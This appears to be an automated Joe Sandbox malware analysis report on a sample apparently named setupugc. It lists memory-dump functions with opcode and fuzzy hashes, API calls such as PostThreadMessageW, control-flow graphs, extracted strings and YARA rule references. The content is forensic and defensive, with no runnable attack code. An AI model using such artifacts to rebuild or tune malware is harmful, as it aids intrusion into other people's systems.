                          • Opcode ID: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                          • Instruction ID: 071c25e6e6e696cbf06b1d04839d0248360b4f19c6547838f646a8b066474913
                          • Opcode Fuzzy Hash: 7b50d23ec37b803bab6d1cb2b1c919f29f1990e99ab645ec99b742f3654b5af0
                          • Instruction Fuzzy Hash: 56900261605604425140B1584818806604997E1301395C115E0554560C875989559369
                          Function 03932BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                          • Instruction ID: ab7194a2acf3d615906986d39479fd5b2bd464d25c01ec18b8f109d475a0fc58
                          • Opcode Fuzzy Hash: 7f1265f7762a8640e4115958c170da7136f69ec2c72da680ee1a4fd091855bac
                          • Instruction Fuzzy Hash: 0490023160950C02E150B1584428B46004987D0301F55C011E0024654D87968B5577A1
                          Function 03932BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                          • Instruction ID: ba5173fb01be06699076b89bafdc9949885677a42d2b4041bef8ea93a2580b05
                          • Opcode Fuzzy Hash: 4420d02525bb0db2549474dba4861862b11ba1871de1b040611177db77df02f1
                          • Instruction Fuzzy Hash: 9F90023120550C02E180B1584418A4A004987D1301F95C015E0025654DCB568B5977A1
                          Function 03932BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                          • Instruction ID: 09aa2b58da5100a06c4d0bbf31caf1d3b0347e05125ddf624cc974b40c8af49a
                          • Opcode Fuzzy Hash: 83f4e1a04f6439b8b2bc4a460a187d7495f599d857a082e002915a973309dedb
                          • Instruction Fuzzy Hash: 4790023120954C42E140B1584418E46005987D0305F55C011E0064694D97668E55B761
                          Function 03932B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                          • Instruction ID: dce561f7d4a38ba3f7003e70b45de958e4bad780b40a988f708e06cf5a49f07a
                          • Opcode Fuzzy Hash: 5a2c23c55a915dd84654e46c5295099c3c784df33b1f9848212a2cf3d124bcda
                          • Instruction Fuzzy Hash: 9B900261206504035105B1584428A16404E87E0201B55C021E1014590DC66689916225
                          Function 03932AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                          • Instruction ID: b3d3959fe93c6281ae7fd06fcd410188bc34b19220ae16e50c6f03d21c61dd90
                          • Opcode Fuzzy Hash: 0d3ca7cc4d7a221818efc3d1e7ad6ac83bb23be625f12d4385aaaef426933f0f
                          • Instruction Fuzzy Hash: 3E900435315504031105F55C071CD0700CFC7D5351355C031F1015550CD773CD715331
                          Function 03932AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                          • Instruction ID: e7d3dcbb9dff8109d5b77cb91799384e26efbbd368afc7e05df0448f0ea7e9eb
                          • Opcode Fuzzy Hash: ec4103d2ffb50869d56616056c88f092ffed69c3e60d4340e092b642bf76b185
                          • Instruction Fuzzy Hash: 18900225225504021145F558061890B048997D6351395C015F1416590CC76289655321
                          Function 03932FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                          • Instruction ID: cac63d534eb0c682d7eb4e7c36e6e7945f2a5836108b3edad2808207d4f19c9a
                          • Opcode Fuzzy Hash: d6e91d72df567969fb4019d2f6bd222e6318f7e6303fdb322e0f9fa225833d5c
                          • Instruction Fuzzy Hash: E2900221605504425140B1688858D064049ABE1211755C121E0998550D869A89655765
                          Function 03932FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                          • Instruction ID: a7ffa00478660fcf416fe169745c48bb608cca0e8fcb500fe4bce194018ead2f
                          • Opcode Fuzzy Hash: f9c501990d9227faea1876de403d4bff6c6eac7d9888a545a5f4f903c3e0e25a
                          • Instruction Fuzzy Hash: 51900221215D0442E200B5684C28F07004987D0303F55C115E0154554CCA5689615621
                          Function 03932F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                          • Instruction ID: 4634d928edb80c507da2a510888a7ad114c6b70419b4c4f8648e91ffa4c604de
                          • Opcode Fuzzy Hash: 0140accab26919e51ab74871588571aaba8f06517d0a5d075904224aad3c214c
                          • Instruction Fuzzy Hash: 2890026134550842E100B1584428F060049C7E1301F55C015E1064554D875ACD526226
                          Function 03932E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                          • Instruction ID: d61c35260e4ae7ee59d24c7678558a597342336f498a9b763353f53ba785a562
                          • Opcode Fuzzy Hash: e57bf31e10ec61be30f7f77dc7c56c86bb0391670d99a548b787459aac3addf6
                          • Instruction Fuzzy Hash: 0590022160550902E101B1584418A16004E87D0241F95C022E1024555ECB668A92A231
                          Function 03932EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                          • Instruction ID: cdc359fb419f31ede06ec35bf55b977a984cd7dccc9e5fe65c82af83c17d1306
                          • Opcode Fuzzy Hash: 683854739f4942c9a7649854fd63b0f773c8bcfbe52f74603b76d3e579306225
                          • Instruction Fuzzy Hash: BF90026120590803E140B5584818A07004987D0302F55C011E2064555E8B6A8D516235
                          Function 03932DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                          • Instruction ID: 0049fd52dbc39495122bdf08b76650b3d3ffb2bb183a6f942458c708b0caaf84
                          • Opcode Fuzzy Hash: 874af575acac4ff1cfb1def9994eabf892f794d1951ceecc5a88ba13d9dabfbb
                          • Instruction Fuzzy Hash: 3F900221246545526545F1584418907404A97E0241795C012E1414950C86679956D721
                          Function 03932DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                          • Instruction ID: d6a55aa4b4b60a4bc1483da3ac20d7fd618ceb2b2da3ba1e13018dcd360c9c6c
                          • Opcode Fuzzy Hash: 9fafa3bb54f3afcad4669fae7921f99d842b2fd57ec2c5f11dd34981aa757ee0
                          • Instruction Fuzzy Hash: 5890023120550813E111B1584518B07004D87D0241F95C412E0424558D97978A52A221
                          Function 03932D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                          • Instruction ID: af1a02e22924812977476bb0c2aae43e28e92c2176a4e06d2af289e133af31e8
                          • Opcode Fuzzy Hash: a55aa3ad573e70bf7b000743dee5e3f43f225b2a057704a4a2033758f71f1322
                          • Instruction Fuzzy Hash: 7B90022921750402E180B158541CA0A004987D1202F95D415E0015558CCA5689695321
                          Function 03932D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                          • Instruction ID: e3aff0bee90bf05031d8ad9230dc96257f8e499e2323c346cf2ed464f9a4023d
                          • Opcode Fuzzy Hash: 2566ab3e709deb8045b167a2560c5f2cf85c4ff1f333a3c5487036dbfde28b52
                          • Instruction Fuzzy Hash: 3690022130550403E140B158542CA064049D7E1301F55D011E0414554CDA5689565322
                          Function 03932CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                          • Instruction ID: 27e948ba4c3b553fc8cb9ee2978f4e6b61da8d50f99a38ba449d59527a6f87e1
                          • Opcode Fuzzy Hash: 6af814af644f25fc14816b596a96493da2059180e5279088be310de364e37588
                          • Instruction Fuzzy Hash: 6A90023120550802E100B598541CA46004987E0301F55D011E5024555EC7A689916231
                          Function 03932C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                          • Instruction ID: 98172ed4f2815d0427bf654bb5cfab9b62ea8356319cb310a722b5972f1a69c8
                          • Opcode Fuzzy Hash: 354815b8e08e8cddb7a7fa2198bd4c22e5b0c3c7dbd8f7e9446b2cbaf861b2e7
                          • Instruction Fuzzy Hash: 0590023120558C02E110B1588418B4A004987D0301F59C411E4424658D87D689917221
                          Function 03932C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                          • Instruction ID: f6290172e3e94e25e6b5e036ab7bbd1c516736702c71da16ba6ec2b21ab93038
                          • Opcode Fuzzy Hash: e001ed60f218bb91731fe8e3560b831c85ad0b56f0974735bbf18c3d5afc8b45
                          • Instruction Fuzzy Hash: 8890023120550C42E100B1584418F46004987E0301F55C016E0124654D8756C9517621
                          Function 039335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                          • Instruction ID: 3963b5324cbc31f56a9c98aaf5695fdabb434fa984d88ada361499a0d93a24e7
                          • Opcode Fuzzy Hash: 1e919ae303389f93ba5ba30e23609fa7407c2bc5b26d66872cace6caab240476
                          • Instruction Fuzzy Hash: 1690023160960802E100B1584528B06104987D0201F65C411E0424568D87D68A5166A2
                          Function 039339B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038C0000, based on PE: true
                          • Associated: 00000011.00000002.4112093368.00000000039E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.00000000039ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_38c0000_setupugc.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                          • Instruction ID: 589c0370722e23713c11ead713f0e3533cf07478b06ad497c0608540c44abedc
                          • Opcode Fuzzy Hash: ab55054242b4255e283161f0844e9427a2342e3c93150d7cc066d06ea5fb0a88
                          • Instruction Fuzzy Hash: E590022124955502E150B15C4418A164049A7E0201F55C021E0814594D869689556321
                          Function 02E60B6F Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 387 2e60b6f-2e60b78 388 2e60bdf-2e60bfc 387->388 389 2e60b7a-2e60b7d 387->389 392 2e60c57-2e60c5e 388->392 393 2e60bfe-2e60c05 388->393 390 2e60b4f-2e60b54 389->390 391 2e60b7f-2e60b8e 389->391 390->387 391->387 394 2e60b90-2e60bb6 391->394 397 2e60c62 392->397 395 2e60c07-2e60c09 393->395 396 2e60c7a-2e60c7f 393->396 400 2e60c1b 394->400 401 2e60bb8-2e60bdc 394->401 402 2e60c0a-2e60c11 395->402 398 2e60c81-2e60c9b 396->398 399 2e60c9d-2e60cae 396->399 403 2e60c64 397->403 404 2e60ce1-2e60d1f call 2e7b410 call 2e7be20 call 2e64470 call 2e51420 397->404 398->399 405 2e60d23-2e60d4a call 2e71b50 399->405 406 2e60cb0-2e60cb7 399->406 401->388 402->397 408 2e60c13-2e60c17 402->408 403->402 409 2e60c67-2e60c78 403->409 404->405 417 2e60d4c-2e60d5b PostThreadMessageW 405->417 418 2e60d6a-2e60d70 405->418 406->404 408->400 409->396 417->418 420 2e60d5d-2e60d67 417->420 420->418
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3h8t0-08$3h8t0-08$a~V
                          • API String ID: 0-2215303234
                          • Opcode ID: 59fc2094abb6971543dedf36680e7526f3fcd353e88e686ebeee3253f199b2f1
                          • Instruction ID: ee770ef67916a9955c6d74ec6fd2d57f91cdccfb137be142f65be2ce020fc10b
                          • Opcode Fuzzy Hash: 59fc2094abb6971543dedf36680e7526f3fcd353e88e686ebeee3253f199b2f1
                          • Instruction Fuzzy Hash: 7851C4329C45996FC712CB70CC959EE7F6AED42288B08D19CE4456B141D7258906C7D1
                          Function 02E60CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 02E60D57
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3h8t0-08$3h8t0-08
                          • API String ID: 1836367815-1947605396
                          • Opcode ID: 05f289e7cceacb00d3bf08d8f93abf911c5d464ed4195f711ad78a47db4b9bde
                          • Instruction ID: d0723746a7cae512b906c8fc27e0b8606b1c9eb9113edef3a661ef66a4df32f2
                          • Opcode Fuzzy Hash: 05f289e7cceacb00d3bf08d8f93abf911c5d464ed4195f711ad78a47db4b9bde
                          • Instruction Fuzzy Hash: D4018471D8021C7ADB11AAE48C81EFFBB7CDF41798F04D068FA1867240E6755E068BB1
                          Function 02E60CDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20threadwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 597 2e60cdc-2e60d5b PostThreadMessageW 599 2e60d5d-2e60d67 597->599 600 2e60d6a-2e60d70 597->600 599->600
                          APIs
                          • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 02E60D57
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E50000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_2e50000_setupugc.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3h8t0-08$3h8t0-08
                          • API String ID: 1836367815-1947605396
                          • Opcode ID: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                          • Instruction ID: 2609b66615616f51a6b9a23c8e2bd4dcd0f247be13eadca744193f4555b7068d
                          • Opcode Fuzzy Hash: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                          • Instruction Fuzzy Hash: 78D0A722AC512866831351A8AC419BD7B7CF983595B0042B7ED04C0011F606451A4AE2
